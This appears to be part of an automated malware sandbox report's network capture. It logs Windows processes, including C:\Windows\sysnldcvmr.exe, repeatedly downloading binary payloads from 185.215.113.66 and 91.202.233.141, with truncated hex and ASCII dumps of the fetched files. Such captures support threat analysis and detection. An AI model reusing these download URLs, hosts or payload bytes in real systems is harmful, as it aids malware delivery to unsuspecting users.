                                                                                                                                                                                                                                                  Data Ascii: ZQg:*F!ExyZyl6F(gO%Fn_\0R_J6G}oJ&bBypG`6~!!S'?`?\i#Y%3xZT/qU^bIn/n}JGG-vam2T5*a.v"[Fu#!D*
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:15.535382032 CET1236INData Raw: 0f b3 d3 05 79 4d 7a a8 6e 58 5a 01 53 d0 02 cb c3 2b 86 63 b6 7f 83 2e eb 0d 93 a1 9d ed 03 12 e4 de 0b d4 1f da f1 2b 75 78 ac 0d d8 d3 d1 37 d3 d4 f5 3d b8 11 26 a3 c7 da 52 4d 50 d2 ae 12 55 a0 a6 f8 4b e6 c8 f4 f8 85 9b 93 57 cb 3a 31 c6 52
                                                                                                                                                                                                                                                  Data Ascii: yMznXZS+c.+ux7=&RMPUKW:1RuY[?@b DYSC^b`a85+N="p-1j'`G$hixmdkeym8)|Sm*7Q%gDUw'P(+P{lC\q"b
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:21.349339962 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:21.799026012 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:21 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 63232
                                                                                                                                                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67497f08-f700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.1149819185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:23.407970905 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736416101 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:24 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 63232
                                                                                                                                                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67497f08-f700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736452103 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                                                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736464977 CET1236INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                                                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736531019 CET1236INData Raw: b3 14 96 cb 1c 0a 64 65 9f 17 1d 52 f9 ae 09 c2 59 f9 97 5b 06 44 1f 60 d5 dc 83 2e 98 cf df f1 08 5d 1d 36 10 63 69 37 f3 11 47 73 c1 1c ec 75 9f a3 5e 11 a4 d3 cd 83 6a 32 cd da 5f a2 80 b4 0b 03 1e 6e e5 80 35 9f 8f 49 86 b6 da c7 ab 4e 6a ba
                                                                                                                                                                                                                                                  Data Ascii: deRY[D`.]6ci7Gsu^j2_n5INj.`/#(W{[uhRfdy6z[$PzqmAEH]6t:FvqlDFT|JG9_,l{!G6eMqP_d
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736545086 CET1236INData Raw: 6d 0d 07 a8 a1 69 a5 5a 9f 67 bb a2 b3 a3 1a 7b df b0 97 3e 9f 20 d8 e2 0f 63 0c 38 c6 ce 9e b0 77 92 c6 65 37 7a e5 0d a5 58 6c cb b5 27 81 75 a6 c5 28 35 e5 3c c3 09 59 f7 dd 4d 9e 8b b5 64 6b e3 1f 4d ed 5b 6c 04 4e ae 54 c3 03 55 4a 4f 76 43
                                                                                                                                                                                                                                                  Data Ascii: miZg{> c8we7zXl'u(5<YMdkM[lNTUJOvCS\u#~z;}#+!%vk@E}rOFmbiVo(s<^]G,:\iLnc\.+#sE@-# ltx5=oPZr
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736557007 CET1236INData Raw: 84 db 0e 73 27 8c 8e 32 19 7c 5f 7e 88 3f 77 9c 60 1b 86 3c 63 9f 5e d3 41 d2 d9 8a 4f 95 24 1c 1e f6 60 45 bf 19 d6 10 06 4b 4f 78 8f 76 05 5c 04 08 0b 84 be cf a5 90 5a 2f 4a 86 44 4c 3e 8e f6 2d dc 92 b9 a0 5e 28 d2 50 08 ce 41 d5 da a6 0e 57
                                                                                                                                                                                                                                                  Data Ascii: s'2|_~?w`<c^AO$`EKOxv\Z/JDL>-^(PAWS$0P"GgyUGdCj]}[`xT9/\^=}%1!lix7pwcdU"5glxDrcyzn#uZxT{4v
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736569881 CET1236INData Raw: eb 8d 97 ab 4b 3a 53 7e da 7f 04 57 bf 19 a7 d6 f3 c3 06 10 b1 09 16 23 60 a7 ba 91 3f 02 de a7 97 e6 74 56 05 8f f9 4f 69 36 6f 76 dd a5 19 ef 75 eb ae 69 3c 09 59 9b 3f 79 da 82 48 6d 9c d2 ba 97 99 83 d8 37 62 31 82 6a 57 5c 5e 54 5f 48 89 00
                                                                                                                                                                                                                                                  Data Ascii: K:S~W#`?tVOi6ovui<Y?yHm7b1jW\^T_H#^fdD`[wj(MEmClltf99az(2>&n+owX0}n)y]EfiH7,>H79;~#4{`M1H<%>^At
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736617088 CET1236INData Raw: 16 25 ae 88 64 71 0b 50 6d 5d 8c 63 a3 e9 91 25 1d aa 31 d9 aa 7a 7d 84 26 a2 95 76 45 23 54 e6 a5 ba c8 c4 c2 4f 36 d6 c9 45 2b a7 d0 b2 a6 b1 75 c4 a8 54 7d 9f da cf 6a dc 88 94 37 ff 38 1e b0 06 49 37 ed 2c 1a c5 bb 71 c3 2f 47 5a 84 9f a4 f8
                                                                                                                                                                                                                                                  Data Ascii: %dqPm]c%1z}&vE#TO6E+uT}j78I7,q/GZ`cr]c!E`qs7`.fg%yT_<Zi4V<NyDm}_Bh_3kSRUH|[E("[(uOtR<HcbJ&xF'KH
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736630917 CET1236INData Raw: 20 a4 13 18 ef 97 b9 85 4c 87 0c 5e 0c 1a 67 ca 13 4f 06 00 22 3d e6 f5 8f b0 55 76 0f 6c 15 ae 5c 5c 57 5a 79 77 7d ed d9 96 48 e9 f1 39 38 66 67 ea f9 af 95 18 f7 5c 22 93 11 dc 4d 2d 2f 2c 66 ab 39 92 61 3d 01 75 ee 0b cb 04 d5 8c dd 42 4d 1a
                                                                                                                                                                                                                                                  Data Ascii: L^gO"=Uvl\\WZyw}H98fg\"M-/,f9a=uBMd"=M,Lo1{@QXR:d=GMw(ZD}E?5GN2KsZf#_qGm8Y61Hc!nb&HskiT1L2Y\Z?w(Vg6FA.;r
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.736643076 CET1236INData Raw: 82 ef 29 d7 83 57 67 67 d1 c1 72 17 81 4d c2 10 51 46 37 9f df 5d 5d c6 a6 e7 87 60 e1 21 98 20 70 0f 63 fc d6 a6 7f 00 d3 65 c6 9b f3 c6 71 fe 78 ec fb 00 0c 86 a7 25 8a 00 32 3a a6 1c 29 b2 89 d8 ac 37 4d 95 04 59 5c b1 46 e3 b1 2f aa d9 cc 11
                                                                                                                                                                                                                                                  Data Ascii: )WggrMQF7]]`! pceqx%2:)7MY\F/P!&mrDcbn0NWcD83Dkv\sLJ/ aU`|RyzDyc#_T(^V71YtMazp{P^:w(ofe
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:24.856443882 CET1236INData Raw: 7e 8d a9 13 7b ea ce ce 59 86 af da ff 6b ca 38 44 bc 32 9a 91 8c 1f 94 36 29 36 c7 1c d6 f8 74 96 7a 5a 96 7d 3b 68 4f 2c de 0e 1a c6 22 83 3c a8 7a 3e 73 40 5f 32 00 76 0a 3f 01 87 54 76 8c 6b 29 ff d0 63 38 3c 45 64 9f db 8f 2c 21 c7 a9 3d 40
                                                                                                                                                                                                                                                  Data Ascii: ~{Yk8D26)6tzZ};hO,"<z>s@_2v?Tvk)c8<Ed,!=@bV;?{!CxR\~DoP1*5"Na+=|]K%=s74O-ADfix)I(LH9[`>n>H*r5X`hD!Or5REpHt 9CQ')}A
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:30.487669945 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:30.926646948 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:30 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 66816
                                                                                                                                                                                                                                                  Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6751d253-10500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:*^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57*= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA|?g}o k?Z5nD8E%|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b|S,Z?9C&]:jE>90F]qj(>rXn{v^e


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.114983391.202.233.141805420C:\Users\user\AppData\Local\Temp\1657630034.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:29.579744101 CET178OUTGET /IBSTSWSONL HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:30.897249937 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:30 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.1149838185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:32.141679049 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.492355108 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:33 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 66816
                                                                                                                                                                                                                                                  Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6751d253-10500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:*^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57*= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA|?g}o k?Z5nD8E%|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b|S,Z?9C&]:jE>90F]qj(>rXn{v^e
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.492400885 CET124INData Raw: c6 7d 84 30 24 76 89 f0 37 5b fe 25 aa 52 93 09 22 e8 f0 4c 0a d9 9f e6 45 fe cc ed b4 af 8e 4c e4 d6 b7 de ab a2 e5 09 3c 68 a2 d8 37 ae d1 0f 94 d8 79 62 f8 4b 8c 24 6c 8f 02 df 92 3e b4 00 98 f9 87 60 ed 95 84 3f 74 c3 b9 d3 0e 94 6c fb 0c 4c
                                                                                                                                                                                                                                                  Data Ascii: }0$v7[%R"LEL<h7ybK$l>`?tlL's%[WX,FTjHihQ<Rr
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.495179892 CET1236INData Raw: 10 0b bc 33 cf fe 47 98 e1 3c 64 34 4c 56 24 40 b9 4d 3c 17 10 a2 d8 0b 9f b2 d8 5f cc ab fa 64 aa 9c 54 88 a4 ff 1a 7c 2c 67 cf e3 e0 2b af cb 15 dc 9b a2 89 55 5b 16 ce 7a 68 a8 5e 16 50 d1 49 01 5f c7 13 c4 77 f4 51 99 76 d4 56 9d a9 73 ae 15
                                                                                                                                                                                                                                                  Data Ascii: 3G<d4LV$@M<_dT|,g+U[zh^PI_wQvVs|nXaGIr30pZYz]>g13TXX5\Zb@9Ptev@r'r=f:s,84n@E@ uHkL>Dt1
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.495242119 CET1236INData Raw: d6 d7 c1 91 d0 16 35 39 77 ae 82 49 77 07 87 b0 fe 68 36 42 71 be 4e 2c 6b c5 6b 32 17 90 0c 01 67 95 20 af 14 e6 c5 d8 bb 6c 36 91 6d d0 79 35 10 91 b1 d6 1e ab 2d 36 37 1e f4 c8 88 10 8d 5a 83 93 da c5 27 c1 fe 06 f1 07 bc 4f e2 b2 2b e7 d4 b4
                                                                                                                                                                                                                                                  Data Ascii: 59wIwh6BqN,kk2g l6my5-67Z'O+M<U\R,Yn/cXtwl'T-@+RY4jLn$"p$on=POF'H:8{r(vW8^z`'r4Mb&}lF~5/
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.495263100 CET1236INData Raw: bc 0a 03 56 b1 f9 76 e2 09 c5 78 f1 7f 0e 64 6c 58 5c d9 40 f1 30 be 6c da d1 c9 aa 45 fb 15 99 c0 9e 82 9e e0 7f 0b cc 42 e3 17 04 35 60 46 9f 17 d4 a6 85 8b 4d 63 8c b5 2a 43 73 bd 4f 42 aa e1 eb a5 ff d0 05 d3 73 30 ce ed ed 1f 18 60 3a a2 98
                                                                                                                                                                                                                                                  Data Ascii: VvxdlX\@0lEB5`FMc*CsOBs0`:R<&^)}ucG9#s[1G3Ml"b5r.,I<JR?8OTv-G9.pThB@r.ptk0Kw8|D-rf9::oZAz
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.495351076 CET1236INData Raw: 32 89 e7 a5 4b c6 7f 90 31 56 b0 d9 e0 9f 13 9f 57 5b 75 92 5b 4c a1 e3 ea 64 8d 8a a4 54 ad fb 93 91 ac 93 9e e7 8d fb b5 71 14 9a 77 1b 9d 53 4f 95 f9 28 40 30 dc 69 5b 1b 8e e6 33 a4 cb 5a 55 5a fb 67 bc 92 2b 6f 36 a0 af 13 45 b7 c6 10 22 bc
                                                                                                                                                                                                                                                  Data Ascii: 2K1VW[u[LdTqwSO(@0i[3ZUZg+o6E"Z[oxd31oH"#$%7H_B=z4Fz@x_WnB'/*Ra3V"|Q {\xCgglBsusy?t1W`tROX
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:33.495366096 CET496INData Raw: bb 77 c5 27 6b 94 b9 ea 87 88 d6 69 8a ad 6f e1 1a 79 67 e4 e6 3c 5e 82 1c 94 f0 d1 ff e9 20 b8 92 fc 8c c8 46 54 15 06 41 49 f4 39 bd f5 33 de 7c 74 4b 85 8e 52 a3 4e 1c b0 c9 89 d7 17 32 9f d0 20 26 0b de d8 f9 3c a2 52 5d b6 0f 95 97 de 47 ed
